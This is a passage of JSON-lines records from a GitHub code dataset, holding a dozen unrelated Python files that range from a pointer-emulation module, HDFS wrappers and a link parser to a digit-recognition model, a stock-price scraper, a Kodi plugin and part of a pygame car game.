raise ValueError(\"failed to find ast.AugAssign\")\n\n if not isinstance(augassign.value, ast.Name):\n raise TypeError(f\"{value} does not have a variable name\")\n\n self.name = augassign.value.id\n self._address = id(value)\n return\n\n self.name = _find_name(frame.f_back, value, self.assign)\n self._address = id(value)\n\n def __irshift__(\n self,\n value: Nullable[Union[\"VarPointer[T]\", T]],\n ):\n self.assign(value)\n return self\n\n\ndef _check_call_expr(\n node: ast.AST, caller_scope: dict, caller: Callable[..., Any]\n) -> Optional[ast.Call]:\n if isinstance(node, ast.Call):\n if isinstance(node.func, ast.Name):\n with suppress(KeyError):\n call_func = caller_scope[node.func.id]\n\n if call_func == caller:\n return node\n elif isinstance(node.func, ast.Attribute) and isinstance(\n node.func.value, ast.Name\n ):\n with suppress(KeyError):\n obj = caller_scope[node.func.value.id]\n attr = getattr(obj, node.func.attr, None)\n\n if attr and (attr == caller):\n return node\n return None\n\n\ndef _find_call_expr(\n node: ast.AST, caller_scope: dict, caller: Callable[..., Any]\n) -> Optional[ast.Call]:\n if isinstance(node, ast.Assign): # ptr = to_var_ptr(my_variable)\n node = node.value\n elif isinstance(node, ast.Expr): # to_var_ptr(my_variable)\n node = node.value\n\n if hasattr(node, \"value\"):\n nd = _find_call_expr(node.value, caller_scope, caller) # type: ignore\n if nd:\n return nd\n\n if hasattr(node, \"args\"):\n args = node.args # type: ignore\n if not isinstance(args, ast.arguments):\n for expr in args:\n nd = _find_call_expr(expr, caller_scope, caller)\n if nd:\n return nd\n return _check_call_expr(node, caller_scope, caller)\n\n\ndef _find_name(frame: Frame, value: Any, caller: Callable[..., Any]) -> str:\n txt = pathlib.Path(frame.f_code.co_filename).read_text()\n expr = _remove_indent(\"\\n\".join(txt.split(\"\\n\")[frame.f_lineno - 1:]))\n caller_scope = {**frame.f_globals, **frame.f_locals}\n call_expr: Optional[ast.Call] = None\n\n for node in ast.parse(expr).body:\n call_expr = _find_call_expr(node, caller_scope, caller)\n\n if call_expr:\n break\n\n if not call_expr:\n raise ValueError(\"failed to find ast.Call\")\n\n param = call_expr.args[0]\n\n if not isinstance(param, (ast.Name, NamedExpr)):\n raise TypeError(f\"{value} does not have a variable name\")\n\n name_expr = param if isinstance(param, ast.Name) else param.target\n\n if not isinstance(name_expr, ast.Name):\n raise TypeError(f\"{ast.dump(name_expr)} is not a name\")\n\n return name_expr.id\n\n\ndef to_var_ptr(value: T) -> VarPointer[T]:\n frame = inspect.currentframe()\n assert frame\n assert frame.f_back\n name = _find_name(frame.f_back, value, to_var_ptr)\n return VarPointer(name, frame.f_back)\n","repo_name":"ZeroIntensity/pointers.py","sub_path":"src/pointers/var_pointer.py","file_name":"var_pointer.py","file_ext":"py","file_size_in_byte":7555,"program_lang":"python","lang":"en","doc_type":"code","stars":848,"dataset":"github-code","pt":"35"} +{"seq_id":"18096327686","text":"# just a quick demo of how we can use \"\" ,'' & '''.\nsubject = 'very responsive'\nprint(subject)\n\n# what to do if we have something like john's laptop is good.\nresponse = \"john's laptop is good\" # we use \"\" to avoid errors\nprint(response)\n\n#what to do if we need to say john said,\"my laptop is working fine\"\nresponse = 'john said,\"my laptop is working fine.\"'\nprint(response)\n\n# in an email we need to use tripple quotes to define the message ie. '''\nemail_message ='''\nhi sir,\nPlease note that all incoming mail's will be forwarded to mail@jfc.com.\n\nThanks.\nkind regards,\nnick.\n'''\nprint(email_message)\n\n# getting character of an index we use square brackets\nsubject = 'very responsive' #starts from 0 or the way while -1 is the last character\nprint(subject[0:-1])\n","repo_name":"nickpeters741/starterhelllo","sub_path":"strings/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4596828995","text":"from __future__ import print_function, unicode_literals\nimport logging\nimport subprocess\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %('\n 'message)s')\n\n\ndef get(remote, local):\n \"\"\"Get from HDFS\"\"\"\n logging.debug(\"Getting %s from HDFS and placing locally at: %s\", remote,\n local)\n subprocess.call(['hadoop', 'fs', '-get', '{}'.format(\n remote), '{}'.format(local)])\n\n\ndef put(local, remote):\n \"\"\"Put into HDFS\"\"\"\n logging.debug(\"Putting %s into HDFS at: %s\", local, remote)\n subprocess.call(['hadoop', 'fs', '-put', '{}'.format(\n local), '{}'.format(remote)])\n\n\ndef mkdir_p(path):\n \"\"\"Make directory with parents if they don't exist\"\"\"\n logging.debug(\"Creating %s on HDFS\", path)\n subprocess.call(['hadoop', 'fs', '-mkdir', '-p', '{}'.format(path)])\n\n\ndef rm_r(path):\n \"\"\"Remove recursively\"\"\"\n logging.debug(\"Removing recursively: %s\", path)\n subprocess.call(['hadoop', 'fs', '-rm', '-r', '{}'.format(path)])\n","repo_name":"michaeltneylon/lofn","sub_path":"lofn/base/hdfs.py","file_name":"hdfs.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"3510760325","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nInput Parser for salted\n~~~~~~~~~~~~~~~~~~~~~\nSource: https://github.com/RuedigerVoigt/salted\n(c) 2020-2021 Rüdiger Voigt\nReleased under the Apache License 2.0\n\"\"\"\n\nimport re\n\nfrom bs4 import BeautifulSoup # type: ignore\nfrom pybtex.database import parse_string # type: ignore\n# a future version of pybtex might get type hints, see:\n# https://bitbucket.org/pybtex-devs/pybtex/issues/141/type-annotations\n\n\nclass Parser():\n \"Methods to extract hyperlinks and mail addresses from different formats.\"\n\n def __init__(self) -> None:\n\n # Specification: https://www.ctan.org/pkg/hyperref\n self.pattern_latex_url = re.compile(\n r\"\\\\url\\{(?P[^{]*?)\\}\",\n flags=re.MULTILINE | re.IGNORECASE)\n self.pattern_latex_href = re.compile(\n r\"\\\\href(\\[.*\\]){0,1}\\{(?P[^}]*)\\}\\{(?P[^}]*?)\\}\",\n flags=re.MULTILINE | re.IGNORECASE)\n\n # Specs:\n # https://pandoc.org/MANUAL.html\n # https://daringfireball.net/projects/markdown/syntax\n # https://github.github.com/gfm/\n self.pattern_md_link = re.compile(\n r\"\\[(?P[^\\[]*)\\]\\((?P[^\\)]*?)[\\s\\)]+\",\n flags=re.MULTILINE | re.IGNORECASE)\n self.pattern_md_link_pointy = re.compile(\n r\"<(?P[^>]*?)>\",\n flags=re.MULTILINE | re.IGNORECASE)\n\n @staticmethod\n def extract_links_from_html(file_content: str) -> list:\n \"\"\"Extract all links from a HTML file.\"\"\"\n matches = []\n soup = BeautifulSoup(file_content, 'html.parser')\n for link in soup.find_all('a'):\n matches.append([link.get('href'), link.text])\n return matches\n\n def extract_links_from_markdown(self,\n file_content: str) -> list:\n \"\"\"Extract all links from a Markdown file.\n Returns a list of lists: [[url, linktext], [url, linktext]]\"\"\"\n matches = []\n md_links_in_file = re.findall(self.pattern_md_link, file_content)\n for match in md_links_in_file:\n matches.append([match[1], match[0]])\n pointy_links_in_file = re.findall(self.pattern_md_link_pointy,\n file_content)\n for url in pointy_links_in_file:\n matches.append([url, url])\n return matches\n\n def extract_links_from_tex(self,\n file_content: str) -> list:\n \"\"\"Extract all links from a .tex file.\n Returns a list of lists: [[url, linktext], [url, linktext]]\"\"\"\n matches = []\n # extract class \\href{url}{text} links\n href_in_file = re.findall(self.pattern_latex_href, file_content)\n for match in href_in_file:\n # The RegEx returns the optinal Element as first element.\n # (Empty, but still in the return if it is not in the string.)\n matches.append([match[1], match[2]])\n # extract \\url{url} links\n url_in_file = re.findall(self.pattern_latex_url, file_content)\n for url in url_in_file:\n matches.append([url, url])\n return matches\n\n @staticmethod\n def extract_links_from_bib(file_content: str) -> list:\n \"\"\"Extract all URLs and DOIs from a .bib file.\n Returns a list of two lists:\n * The first one in the format [[url, text], [url, text]] - with text\n being the key-value of the bibtex-entry and the respective field.\n * The second one in the format [[doi, text], [doi, text]] - text\n being the key-value of the bibtex-entry and the field.\"\"\"\n url_list = []\n doi_list = []\n bib_data = parse_string(file_content, bib_format='bibtex')\n for entry in bib_data.entries:\n # Neither the URL, nor the DOI field is required by BiBTeX.\n # pybtex throws a KeyError if the field does not exist.\n try:\n url = bib_data.entries[entry].fields['Url']\n url_list.append([url, f\"Key: {entry}, Field: Url\"])\n except KeyError:\n pass\n\n try:\n doi = bib_data.entries[entry].fields['Doi']\n doi_list.append([doi.strip(), f\"Key: {entry}, Field: DOI\"])\n except KeyError:\n pass\n\n return [url_list, doi_list]\n\n @staticmethod\n def extract_mails_from_mailto(mailto_link: str) -> None:\n \"\"\"A single mailto link can contain *multiple* mail addresses.\n Extract them and return them as a list.\"\"\"\n mailto_link = mailto_link[7:] # cut off the mailto: part\n # TO DO\n pass\n","repo_name":"RuedigerVoigt/salted","sub_path":"salted/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"75235259307","text":"#!/usr/bin/python3\nimport rospy\nimport cv2\nimport numpy as np\n\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import Point\nfrom std_msgs.msg import String\nfrom cv_bridge import CvBridge, CvBridgeError\n\nfrom sky_detectors import BlockDetector\n\nfrom cam_config import CAMERA_MATRIX, DISTORTION_MATRIX, CAMERA_FOV, CAMERA_RES\n\n\nclass BlockROS:\n def __init__(self):\n #Sim ranges\n lower_mask = np.array([110, 50, 50]) \n upper_mask = np.array([130, 255, 255])\n\n #Drone ranges\n #lower_mask = np.array([[90,50,50]])\n #upper_mask = np.array([105, 255, 255])\n\n # Create the block detector object\n self.detector = BlockDetector(CAMERA_RES, lower_mask, upper_mask)\n\n # State of the detection\n self.type = \"\"\n\n # ROS node\n rospy.init_node('sky_vision_block', anonymous=False)\n\n # Bridge ros-opencv\n self.bridge_object = CvBridge()\n\n # Post detection image publisher\n self.newimg_pub = rospy.Publisher('/sky_vision/down_cam/img_result', Image, queue_size=10)\n self.cam = Image()\n\n # Post detection pose info publisher\n self.pose_pub = rospy.Publisher('/sky_vision/down_cam/block/pose', Point, queue_size=1)\n self.pose = Point()\n\n try:\n print(\"\\nCreating block subscribers...\")\n rospy.Subscriber('/sky_vision/down_cam/img_raw', Image, self.camera_callback)\n rospy.Subscriber('/sky_vision/down_cam/type', String, self.type_callback)\n print(\"Block Subscribers up!\")\n except:\n print('Error trying to create subscribers!')\n\n self.frame = None\n\n rospy.spin()\n\n\n def type_callback(self, message):\n\n # Get current state\n self.type = message.data\n\n\n #-- Get new frame\n def camera_callback(self, message):\n \n if self.type == \"block\":\n #print(\"UIUIUIUI\")\n # Bridge de ROS para CV\n cam = self.bridge_object.imgmsg_to_cv2(message, \"bgr8\")\n self.frame = cam\n\n target = self.detector.mapCircles(self.frame)\n\n if target is not None:\n #print(\"AAAAAAAAAAAAAAAAAAAAAAAAA\")\n (cx, cy), (w, h), angle = target\n draw_img = cv2.circle(self.frame, (int(cx), int(cy)), 5, (0, 0, 255), -1)\n # Publish image with target identified\n ros_img = self.bridge_object.cv2_to_imgmsg(draw_img, 'bgr8')\n self.newimg_pub.publish(ros_img)\n\n self.pose.x = cx\n self.pose.y = cy\n self.pose.z = 0\n\n # Publish target pose info\n self.pose_pub.publish(self.pose)\n\n\npackage = BlockROS()","repo_name":"SkyRats/sky_vision","sub_path":"src/block2ros.py","file_name":"block2ros.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24703782758","text":"N = int(input())\ndict = {}\n\nfor i in range(N) :\n name, state = input().split()\n if state == \"enter\" :\n dict[name] = state\n \n else :\n del dict[name]\n\ndict = sorted(dict.keys(), reverse=True)\n\nfor j in dict :\n print(j)","repo_name":"Sonjieun2/AlgorithmStudy","sub_path":"Baekjoon/2023_7/0704/7785.py","file_name":"7785.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70025192428","text":"# Реализуйте алгоритм перемешивания списка.\r\n\r\nfrom random import randint, shuffle\r\n\r\nlst = [i for i in range(10)]\r\n\r\nfor i in range(len(lst)):\r\n temp = lst[i]\r\n r = randint(0, len(lst) - 1)\r\n lst[i] = lst[r]\r\n lst[r] = temp\r\nprint(lst)","repo_name":"YuriyOzornin/PythonExamples","sub_path":"ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29445319172","text":"#!python\n\nimport sys\nsys.path.insert(0, '..')\nimport hexomap\nfrom hexomap import reduction\n\nstartIdx = 333224\ntiffInitial = '/media/heliu/Seagate Backup Plus Drive/krause_jul19/nf/s1350_100_1_nf/s1350_100_1_nf_'\ndigit = 6\nextention = '.tif'\nNInt = 4 # integrate 4 images into 1.\nNImage = 4 # 1440*22 # number of images before integration\noutInitial = '/media/heliu/Seagate Backup Plus Drive/krause_jul19/nf/s1350_100_1_nf/s1350_100_1_nf_int4_'\noutStartIdx = 0 # starting index of output image\n\nreduction.integrate_tiff(tiffInitial, startIdx, digit, extention, NImage, NInt,outInitial, outStartIdx)","repo_name":"HeLiuCMU/HEXOMAP","sub_path":"scripts/int_tiff.py","file_name":"int_tiff.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"1541731345","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nimport os\r\n\r\ndf_test = pd.read_csv('test.csv')\r\ndf_test_values = df_test.values\r\n\r\ndf_train = pd.read_csv('train.csv')\r\ndf_train_values = df_train.values\r\n\r\nans = pd.read_csv('sample_submission.csv')\r\n\r\nx_train = df_train_values[:,1:]\r\ny_train = df_train_values[:,0]\r\n\r\n\r\nDT_C = RandomForestClassifier()\r\nDT_C.fit(x_train,y_train)\r\n\r\ny_pred = DT_C.predict(df_test_values)\r\ny_pred = pd.Series(y_pred)\r\n#draw:\r\n\r\nfig,ax1 = plt.subplots(1)\r\nax1.imshow((df_test_values[5].reshape(28,28)),cmap='gray')\r\nplt.show()\r\n\r\n'''\r\ntest1 = pd.DataFrame([[23,5],[2,5],[15,78],[0,6]],\r\n columns = ['hello','yo'])\r\ntest2 = pd.Series([11])\r\n\r\ntest3 = test1.join(test2.rename('yo1'),how= 'left')\r\n''' \r\nans = ans.drop(columns='Label',axis = 1 )\r\nans = ans.join(y_pred.rename('Label'))\r\n\r\nans.to_csv('submission_RF.csv',index= False)\r\n\r\n'''\r\nUsing Keras CNN\r\n\r\n'''\r\n\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Flatten, MaxPool2D\r\nfrom keras.layers import Conv2D\r\nfrom sklearn.model_selection import train_test_split\r\nimport numpy as np\r\nfrom keras.utils import to_categorical\r\n#x_train = x_train.reshape(42000,28,28,1)\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n x_train, y_train, test_size=0.2, random_state=0)\r\n\r\nX_train = X_train.reshape(33600,28,28,1)\r\nX_test = X_test.reshape(8400,28,28,1)\r\ny_train1 = np.array(y_train)\r\ny_test1 = np.array(y_test)\r\n\r\n'''\r\n# Transfer,for example as y_train(28140,) to (28140,10)\r\n# [8] = [0,0,0,0,0,0,0,0,1,0]\r\n\r\n'''\r\ny_train1 = to_categorical(y_train)\r\ny_test1 = to_categorical(y_test)\r\n\r\ncnn = Sequential()\r\ncnn.add(Conv2D(32,kernel_size =(3,3),\r\n activation = 'relu',\r\n input_shape=(28,28,1)))\r\ncnn.add(Dropout(0.25))\r\ncnn.add(Conv2D(32,(3,3),activation='relu'))\r\ncnn.add(Dropout(0.25))\r\ncnn.add(Conv2D(32,(3,3),activation='relu'))\r\ncnn.add(MaxPool2D(pool_size=(2,2)))#pooling layer\r\n\r\ncnn.add(Flatten())\r\ncnn.add(Dense(512,activation='relu'))\r\ncnn.add(Dense(256,activation='relu')) #fully connected layer\r\ncnn.add(Dropout(0.5))\r\ncnn.add(Dense(units=10,activation='softmax')) #output layer\r\n\r\ncnn.compile(loss='categorical_crossentropy',\r\n optimizer='adam',\r\n metrics=['accuracy'])\r\n\r\ncnn.fit(X_train,y_train1,\r\n batch_size=128,\r\n epochs = 10,\r\n validation_data=(X_test,y_test1))\r\n\r\n\r\ncnn.summary()\r\nAccuracy = cnn.evaluate(X_test, y_test1,verbose = 0)\r\nprint(\"Accuracy_CNN: \" ,Accuracy)\r\n\r\ndf_test_values_transform = df_test_values.reshape(-1,28,28,1)\r\n\r\n#predict the test\r\nresults = cnn.predict(df_test_values_transform)\r\nresults = np.argmax(results, axis=1)\r\nresults = pd.Series(results)\r\nans = ans.drop(columns = ['Label'])\r\nans = ans.join(results.rename('Label'))\r\n\r\nans.to_csv('submission.csv',index = False)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"maxgood019/Machine_learning","sub_path":"Digit Recognition/Digit-recognizer.py","file_name":"Digit-recognizer.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22515741978","text":"#!/usr/bin/env python3\n\"\"\"\nClusterization of LD matrices with dbscan and hdsbcan\nAuthor: Nikita Sapozhnikov, nikita.sapozhnikov1@gmail.com\nDate: November 02, 2023\nsnp_clustering for CPU time tests\n\"\"\"\n\nimport time\nimport os\nimport sys\nimport resource\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\nimport h5py\n\n\nEPS = np.linspace(0.05, 1, 20)\nMIN_SAMPLES = np.arange(2, 20, 1)\n\n\ndef get_memory_usage():\n \"\"\"\n get memory utilization\n \"\"\"\n usage = resource.getrusage(resource.RUSAGE_SELF)\n return (usage.ru_maxrss / 1024.0) # Convert to kilobytes\n\n\ndef prepare_data() -> np.ndarray:\n \"\"\"\n data preparation function\n \"\"\"\n matrix_file_path = os.path.join('data', 'chr3-1.ld.h5')\n try:\n print('Openning matrix file...')\n with h5py.File(matrix_file_path, 'r') as corr_file:\n dset = corr_file['r2']\n ld_matrix = dset['block0_values']\n corr_matrix = np.array(ld_matrix)\n except FileNotFoundError:\n sys.exit('Invalid matrix file path.')\n\n np.nan_to_num(corr_matrix, copy=False)\n np.abs(corr_matrix, out=corr_matrix)\n corr_matrix = 1 - corr_matrix\n np.fill_diagonal(corr_matrix, 0)\n print(corr_matrix)\n print(f\"Memory usage: {get_memory_usage():.2f} KB\")\n return corr_matrix\n\n\ndef dbscan_clustering(diss_matrix: np.ndarray,\n eps: float,\n min_samples: int) -> float:\n \"\"\"\n perform a dbscan clustering\n \"\"\"\n time_start = time.time()\n DBSCAN(eps=eps,\n min_samples=min_samples,\n metric='precomputed',\n n_jobs=-1).fit(diss_matrix)\n time_end = time.time()\n clusterization_time = time_end - time_start\n print('Time of clustering: ', clusterization_time)\n print(f\"Memory usage: {get_memory_usage():.2f} KB\")\n return clusterization_time\n\n\nif __name__ == '__main__':\n time_list = []\n matrix = prepare_data()\n for eps_ in EPS:\n for min_samples_ in MIN_SAMPLES:\n print(f'Parameters pair:\\neps:\\t{eps_}\\nmin_samples:\\t{min_samples_}')\n iter_time = dbscan_clustering(diss_matrix=matrix,\n eps=eps_,\n min_samples=min_samples_)\n time_list.append(iter_time)\n print('Total time is: ', sum(time_list))\n mean = np.mean(time_list)\n print(f'Mean for eps = {eps_}:', mean)\n\n median = np.median(time_list)\n print(f'Median for eps = {eps_}:', median)\n # ddof=1 for sample standard deviation\n std_dev = np.std(time_list, ddof=1)\n print(f'Standart Deviation for eps = {eps_}:', std_dev)\n","repo_name":"NSapozhnikov/CPU_test","sub_path":"snp_clustering_cpu_test.py","file_name":"snp_clustering_cpu_test.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28555709426","text":"import requests\nimport traceback,json,datetime,time\nfrom time import strftime, localtime\n\n \nclass stock(object):\n\n def __init__(self, urlList, mess, vmUrl, historyfiveDayUrlList, vmUrlExp):\n self.urlList = urlList\n self.vmUrl = vmUrl\n self.historyfiveDayUrlList = historyfiveDayUrlList\n self.vmUrlExp = vmUrlExp\n return\n \n def getAllData(self):\n for i in (self.urlList):\n timeStamp = time.time()\n data = self.getData(i[\"url\"])\n if data == \"\":\n break\n #stock_baidu{location=\"us\",name=\"baidu\",type=\"now\"}\n vmStr = 'stock,type=now,name=%s,location=%s baidu=%s' \\\n % (i[\"name\"], i[\"location\"], data['Result'][0]['TplData']['result']['price'] )\n print(vmStr, datetime.datetime.now())\n self.sendDataToVm(self.vmUrl, vmStr)\n \n return vmStr\n \n def getData(self, url):\n try:\n \n payload=''\n headers = {\n 'Content-Type': 'application/json'\n }\n #print(urlIneed, payload, headers)\n resp = requests.post(url, data=payload, headers=headers) \n #if resp.status_code != 200 and retry > 0 : \n #self.tigger_ineed()\n #print(idc +' ' + appid + \" error : \" + str(r.content) + ' get ins_list error , please manunal check' )\n #return\n str1=str(resp.content, encoding = \"utf-8\")\n data=json.loads(str1)\n #print(\"all insList len is \", len(data), \" \",data) \n\n \n return data\n except Exception as e:\n print(traceback.print_exc())\n return \"\"\n \n def sendDataToVm(self, url, data):\n payload=data\n headers = {\n 'Content-Type': 'text'\n }\n #print(urlIneed, payload, headers)\n resp = requests.post(url, data=payload, headers=headers) \n str1=str(resp.content, encoding = \"utf-8\")\n \n print(str1)\n\n def getHistoryData(self):\n for i in (self.historyfiveDayUrlList):\n timeStamp = time.time()\n data = self.getData(i[\"url\"])\n if data == \"\":\n break\n vmStr=\"\"\n for d in data[\"Result\"][\"fivedays\"]:\n print(d)\n for dPont in d[\"priceinfos\"]:\n print(dPont)\n #stock{type=\"fiveDay\"}\n vmStr += 'stock{type=\"fiveDay\",name=\"%s\",location=\"%s\"} %s %s\\n' \\\n % (i[\"name\"], i[\"location\"], dPont[\"price\"], dPont[\"time\"])\n print(vmStr)\n self.sendDataToVm(self.vmUrlExp, vmStr)\n\ndef isFriday():\n now_time = strftime(\"%H:%M:%S\", localtime())\n print(now_time)\n if localtime().tm_wday == 4 and now_time == \"17:00:00\":\n return True\n return False\n \n\nif __name__ == '__main__':\n\n\n urlList = [{\"url\":\"http://finance.pae.baidu.com/vapi/stockshort?code=09888&market=hk&finClientType=pc\",\"name\":\"baidu\",\"location\":\"hk\"}, \n {\"url\":\"https://finance.pae.baidu.com/vapi/stockshort?code=BIDU&market=us&finClientType=pc\",\"name\":\"baidu\",\"location\":\"us\"}]\n historyfiveDayUrlList = [{\"url\":\"https://finance.pae.baidu.com/selfselect/getstockquotation?code=09888&all=1&ktype=1&isIndex=false&isBk=false&isBlock=false&isFutures=false&stockType=hk&group=quotation_fiveday_hk&finClientType=pc\",\"name\":\"baidu\",\"location\":\"hk\"},\n {\"url\":\"https://finance.pae.baidu.com/selfselect/getstockquotation?code=BIDU&all=1&ktype=1&isIndex=false&isBk=false&isBlock=false&isFutures=false&stockType=us&group=quotation_fiveday_us&finClientType=pc\",\"name\":\"baidu\",\"location\":\"us\"}]\n task = stock(urlList, \"\", 'http://localhost:8428/write', historyfiveDayUrlList, \"http://localhost:8428/api/v1/import/prometheus\")\n task.getAllData()\n if isFriday() :\n task.getHistoryData()\n\n while True:\n task.getAllData()\n time.sleep(1)\n\n","repo_name":"whatattitude/stock-quantization","sub_path":"craw.py","file_name":"craw.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11665801988","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n SPDX-License-Identifier: Unlicense\n See LICENSES/Unlicense for more information.\n\"\"\"\n\ntry:\n from kodi_six import xbmc\n from kodi_six import xbmcaddon\n from kodi_six import xbmcgui\n from kodi_six import xbmcplugin\n from kodi_six import xbmcvfs\n from kodi_six.utils import *\nexcept ImportError:\n import xbmc\n import xbmcaddon\n import xbmcgui\n import xbmcplugin\n import xbmcvfs\n\nimport routing\n\nplugin = routing.Plugin()\naddon = xbmcaddon.Addon(id='plugin.script.testing')\n\n\n@plugin.route('/')\ndef main():\n \"\"\"\n Plugin path: plugin://plugin.script.testing/\n\n Create a menu item for each testable item type\n\n - Folder\n - Playable Item\n - Unplayable Item\n \"\"\"\n\n def create_menu_item(label, route, is_folder, is_playable):\n item = xbmcgui.ListItem(label=label)\n\n if isinstance(is_playable, bool):\n item.setProperty(key='IsPlayable', value=str(is_playable).lower())\n if is_playable:\n item.setInfo('video', {'title': label})\n\n xbmcplugin.addDirectoryItem(handle=plugin.handle, url=plugin.url_for(func=route),\n listitem=item, isFolder=is_folder)\n\n # plugin://plugin.script.testing/folder\n # label: Folder\n create_menu_item(label=addon.getLocalizedString(30010), route=folder, is_folder=True,\n is_playable=None)\n\n # plugin://plugin.script.testing/play\n # label: Playable Item\n create_menu_item(label=addon.getLocalizedString(30011), route=play, is_folder=False,\n is_playable=True)\n\n # plugin://plugin.script.testing/action\n # label: Unplayable Item\n create_menu_item(label=addon.getLocalizedString(30012), route=action, is_folder=False,\n is_playable=False)\n\n xbmcplugin.endOfDirectory(handle=plugin.handle, succeeded=True, cacheToDisc=False)\n\n\n@plugin.route('/folder')\ndef folder():\n \"\"\"\n Plugin path: plugin://plugin.script.testing/folder\n\n \"Folder\" menu item endpoint\n \"\"\"\n\n # -- add code --\n\n xbmcplugin.endOfDirectory(handle=plugin.handle, succeeded=True, cacheToDisc=False)\n\n\n@plugin.route('/play')\ndef play():\n \"\"\"\n Plugin path: plugin://plugin.script.testing/play\n\n \"Playable Item\" menu item endpoint\n \"\"\"\n\n playable_path = ''\n\n # -- add code --\n\n list_item = xbmcgui.ListItem(label=addon.getLocalizedString(30011)) # label: Playable Item\n list_item.setProperty(key='IsPlayable', value='true')\n list_item.setInfo('video', {'title': addon.getLocalizedString(30011)})\n list_item.setPath(path=playable_path)\n\n # -- add code --\n\n xbmcplugin.setResolvedUrl(handle=plugin.handle, succeeded=True, listitem=list_item)\n\n\n@plugin.route('/action')\ndef action():\n \"\"\"\n Plugin path: plugin://plugin.script.testing/action\n\n \"Unplayable Item\" menu item endpoint\n \"\"\"\n\n # -- add code --\n\n pass\n\n\nif __name__ == '__main__':\n plugin.run()\n","repo_name":"anxdpanic/plugin.script.testing","sub_path":"resources/lib/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36702818184","text":"#Thư viện\nimport pygame,sys\nfrom pygame.locals import *\nfrom pygame import mixer\nimport random\nfrom pygame.sprite import Group\npygame.init()\n\n#Màu nền\ngray=(100,100,100)\ngreen=(76,208,56)\nyellow=(255,232,0)\nred=(200,0,0)\nwhite=(255,255,255)\nblack=(0,0,0)\n\n#Tạo cửa sổ game\nwidth=500\nheight=500\nscreen_size=(width,height)\nscreen=pygame.display.set_mode(screen_size)\npygame.display.set_caption(\"Xe Vượt Chướng Ngại Vật\")\n\n#Tạo nhạc nền khi bắt đầu game\npygame.mixer.music.load('music/BackgroundMusic.wav')\nmixer.music.play()\n\n#Khởi tạo biến\ngameover=False\nspeed=2\nscore=0\nkmh=40 #Km/h\n\n#Đường xe chạy và vạch kẻ đường\nroad_width=300\nstreet_width=10\nstreet_height=50\n\n#Lane đường\nlane_left=150\nlane_center=250\nlane_right=350\nlanes=[lane_left,lane_center,lane_right]\nlane_move_Y=0\n\n#Đường xe chạy và biên đường\nroad=(100,0,road_width,height)\nleft_edge=(95,0,street_width,height)\nright_edge=(395,0,street_width,height)\n\n#Vị trí ban đầu của người chơi\nplayer_x=250\nplayer_y=400\n\n#Đối tượng xe công cộng\nclass Vehicle(pygame.sprite.Sprite):\n def __init__(self, image,x,y):\n pygame.sprite.Sprite.__init__(self)\n\n #Chỉnh hình cho phù hợp\n image_scale= 45 / image.get_rect().width\n new_width= image.get_rect().width * image_scale\n new_height=image.get_rect().height*image_scale\n self.image=pygame.transform.scale(image,(new_width,new_height))\n self.rect=self.image.get_rect()\n self.rect.center=(x,y)\n\n#Tạo xe công cộng\nimage_name=['pickup_truck.png','semi_trailer.png','taxi.png','van.png']\nVehicle_image=[]\nfor name in image_name:\n image=pygame.image.load('images/'+name)\n Vehicle_image.append(image)\n\n#Sprite groups\nplayer_group = pygame.sprite.Group()\nvehicle_group=pygame.sprite.Group()\n\n#Đối tượng xe người chơi\nclass Player_vehicle(Vehicle):\n def __init__(self,x,y):\n image=pygame.image.load('images/car.png')\n super().__init__(image,x,y)\n\n#Tạo xe người chơi\nplayer=Player_vehicle(player_x,player_y)\nplayer_group.add(player)\n\n\n#Tạo va chạm\ncrash=pygame.image.load('images/crash.png')\ncrash_rect=crash.get_rect()\n\n#Cài đặt khung hình/s (FPS)\nclock=pygame.time.Clock()\nfps=120\n\n# Tạo màn hình hướng dẫn\ndef show_start_screen():\n # Vẽ nền màn hình dừng\n #Vẽ địa hình cỏ\n screen.fill(green)\n\n #Vẽ mặt đường\n pygame.draw.rect(screen,gray,road)\n\n #Vẽ biên đường\n pygame.draw.rect(screen,yellow,left_edge) \n pygame.draw.rect(screen,yellow,right_edge)\n\n #Vẽ lane đường\n for y in range(street_height * -2,height,street_height*2):\n pygame.draw.rect(screen,white,(lane_left + 45,y + lane_move_Y, street_width,street_height))\n pygame.draw.rect(screen,white,(lane_center + 45,y + lane_move_Y, street_width,street_height))\n\n #Vẽ xe người chơi\n 